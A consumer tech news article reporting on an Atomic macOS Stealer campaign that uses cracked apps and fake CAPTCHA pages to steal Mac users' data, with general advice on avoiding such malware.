Macs under attack from ‘cracked’ apps spreading dangerous info-stealing malware — don’t fall for this

A person typing on a laptop with warning messages displayed on screen

(Image credit: Shutterstock)

Follow Apple Event Live now

iPhone 17 Pro Max, Tim Cook and Apple Watch 10 — (Image credit: MacRumors/Getty/Apple)

Apple is about to launch the new iPhone. Follow our iPhone 17 event live blog right now!

Hackers are once again targeting the best MacBooks and other Apple computers in an effort to infect them with dangerous malware designed to steal passwords, files, browser data and more.

As reported by Infosecurity Magazine, the cybersecurity firm Trend Micro recently discovered a new Atomic macOS Stealer campaign that uses ‘cracked’ or pirated versions of popular macOS software as a lure. When this doesn’t work, the cybercriminals behind this campaign use fake CAPTCHA to the same end.

While you might think your Mac is safer than one of the best Windows laptops, think again, as hackers now love to target Apple’s computers in their attacks. This makes sense, too, as those willing to pay more for a premium laptop will likely make better (and more profitable) targets.

Here’s everything you need to know about this new campaign along with some tips and tricks to help keep you and your Apple computer safe from hackers.

From cracked to hacked

A hand typing at a computer in a dark room, lit up by the laptop's keyboard LEDs and red LED light — (Image credit: Getty Images)

In its report, Trend Micro reveals that this new campaign begins with an attacker tricking a macOS user into downloading a fake or cracked version of a popular app. This malicious app then acts as a Trojan horse to deliver and install the Atomic macOS Stealer onto their computer.

These fake apps could be promoted on forums, in direct messages sent over social media or even through malicious ads. When a potential victim goes to download one of them, they’re redirected to a hacker-controlled page and prompted to click on a button which reads “Download for MacOS.”

In one case analyzed by Trend Micro’s security researchers, victims saw their Macs infected with malware after trying to download a cracked version of the legitimate app CleanMyMac. While the download site appeared to be legitimate at first glance, clicking on the “Download Now” button took them to Atomic macOS Stealer landing page.

Alternatively, victims might be instructed to copy and paste commands into Apple Terminal. Doing so leads to the execution of a malicious installation script which creates a binary file that lets the hackers establish persistence on a vulnerable Mac.

From there, the script copies loads of sensitive data off an infected Apple computer, including:

System Profile information
Username and password
Browser data (including cookies, web data, and login information)
Cryptocurrency wallet data
Telegram data
OpenVPN profiles
Keychain data
Apple Notes data
Various files from folders on the system

All of this sensitive personal data is then compressed and sent back to a hacker-controlled server to use in follow-up attacks. Likewise, this data could also be sold to other hackers on the dark web to use in their own attacks.

How to stay safe from Mac malware

A padlock resting next to the Apple logo on the lid of a gold-colored Apple laptop.

(Image credit: robert coolen/Shutterstock)

Just like on one of the best iPhones, you want to stick to the Apple App Store for downloading new apps for your Mac when possible. If you do download an app from outside the App Store, make sure it’s from the website of a reputable Mac developer first.

To do so, carefully examine the URL and you also want to look for signs of misspelled words or poor grammar as these can be a dead giveaway that you’re on a malicious site and not a legitimate one. You also want to be careful how you get to a vendor’s site. Instead of clicking on ads which appear in the top results on Google and other search engines which can be faked, you want to scroll further down the page to find a company’s actual site.

Although it goes without saying, you should never download cracked or pirated software. Besides hurting developers, doing so puts you at risk since you never really know what’s inside an app you downloaded illegally. Sure, it could work as intended but there’s also a chance that it might contain malicious code designed to steal your data or worse, take over your Mac.

As for staying safe, while your Mac does come with built-in protection in the form of Gatekeeper and XProtect, you may also want to consider using one of the best Mac antivirus software solutions alongside them. Third-party antivirus software is updated more regularly and it often includes other useful extras like access to one of the best VPN services or a password manager.

Hackers will likely continue to prey on Mac users given that the old and no longer true advice that Apple computers can’t get viruses is still quite widespread. However, you can stay safe by remaining vigilant online and this is especially true when downloading new software and apps.

Follow Tom's Guide on Google News to get our up-to-date news, how-tos, and reviews in your feeds. Make sure to click the Follow button.

More from Tom's Guide

See more Computing News

Anthony Spadafora is the managing editor for security and home office furniture at Tom’s Guide where he covers everything from data breaches to password managers and the best way to cover your whole home or business with Wi-Fi. He also reviews standing desks, office chairs and other home office accessories with a penchant for building desk setups. Before joining the team, Anthony wrote for ITProPortal while living in Korea and later for TechRadar Pro after moving back to the US. Based in Houston, Texas, when he’s not writing Anthony can be found tinkering with PCs and game consoles, managing cables and upgrading his smart home.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.